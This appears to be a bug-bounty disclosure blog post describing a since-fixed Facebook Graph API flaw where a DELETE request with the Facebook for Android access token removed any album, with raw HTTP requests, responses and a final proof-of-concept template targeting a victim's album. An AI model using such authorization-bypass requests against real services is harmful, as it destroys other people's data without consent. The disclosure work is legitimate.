Facebook album deletion vulnerability worth USD 12500

Facebook album deletion vulnerability worth USD 12500

Overview: What if your photo is accidentally deleted?

Obviously, this problem is annoying, right? This article is about a vulnerability I found that allows malicious users to delete any album on Facebook. Yes, any user, page, or group album can be deleted.

Graph API is a primary method used by developers to read and write user data. All Facebook apps use Graph APIs. Generally, Graph API requires an access token to read or write user data.

The Facebook developer's document states that the album cannot be deleted through the album node in the Graph API.

I tried to access token in the image browser to delete one of my albums.

Request :-DELETE /518171421550249 HTTP/1.1Host :  graph.facebook.com Content-Length: 245access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZDResponse :-{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

 

Why? This application does not have the function of deleting an album. But we need to pay attention to its error information. It tells us that some other applications do have the function of calling this API.

I decided to try Facebook's mobile access token, because we can see the options for deleting all albums on the Facebook mobile app, isn't it? Great. It uses the same API. So I took my own album id and Facebook's Android access token and tried it.

Request :-DELETE /518171421550249 HTTP/1.1Host :  graph.facebook.com Content-Length: 245access_token=<Facebook_for_Android_Access_Token>Response :-trueAlbum(518171421550249) got deleted :D so whats the next step? Took victim's album id and tried to delete it. I was very curious to see the result. Request :-DELETE /518171421550249 HTTP/1.1Host :  graph.facebook.com Content-Length: 245access_token=<Facebook_for_Android_Access_Token>Response :-true

Oh, my God! Album deleted! So I got the key to delete all your Facebook albums, haha.

I will immediately report this vulnerability to the Facebook security team. They responded too quickly and provided a solution in less than two hours.

Finally, PoC:

Request :-DELETE /<Victim's_photo_album_id> HTTP/1.1Host :  graph.facebook.com Content-Length: 245access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

If you are not sure what to do, watch the following video:

 

The Facebook security team sent the first thank-you letter:

I was rewarded with 12500 USD for fixing my replies and my reports on vulnerabilities.

The vulnerability has been completely repaired.

Thanks to the Facebook security team for providing the vulnerability rewards program and quickly fixing this vulnerability.